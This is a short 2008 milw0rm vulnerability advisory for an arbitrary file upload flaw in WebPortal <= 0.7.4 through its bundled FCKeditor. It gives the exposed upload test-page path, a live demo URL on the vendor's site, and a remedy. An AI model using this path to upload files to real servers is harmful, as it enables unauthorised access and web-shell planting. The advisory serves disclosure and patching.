47 lines
No EOL
999 B
Text
47 lines
No EOL
999 B
Text
########################################################################
|
|
#
|
|
# S.W.A.T.
|
|
#
|
|
# Title: WebPortal <= 0.7.4 (fckeditor) Remote Arbitrary File Upload
|
|
#
|
|
# Vendor: http://webportal.ivanoculmine.com/download.php?mid=14
|
|
#
|
|
# Discover by : S.W.A.T.
|
|
#
|
|
# svvateam@yahoo.com
|
|
#
|
|
# Impact: Medium
|
|
#
|
|
# Fix: Disable It In The Config File ;)
|
|
#
|
|
# Site: wWw.SvvaT.IR
|
|
#
|
|
########################################################################
|
|
|
|
####################
|
|
- Exploit:
|
|
####################
|
|
|
|
http://example.com/[path]/libraries/htmleditor/editor/filemanager/upload/test.html
|
|
|
|
####################
|
|
- Demo:
|
|
####################
|
|
|
|
http://demos.ivanoculmine.com/webportal/libraries/htmleditor/editor/filemanager/upload/test.html
|
|
|
|
####################
|
|
- Solution:
|
|
####################
|
|
|
|
Restrict and grant only trusted users access to the resources.
|
|
|
|
####################
|
|
- GreTzZ :
|
|
####################
|
|
|
|
All My Friend's , Str0ke
|
|
|
|
####################
|
|
|
|
# milw0rm.com [2008-09-12] |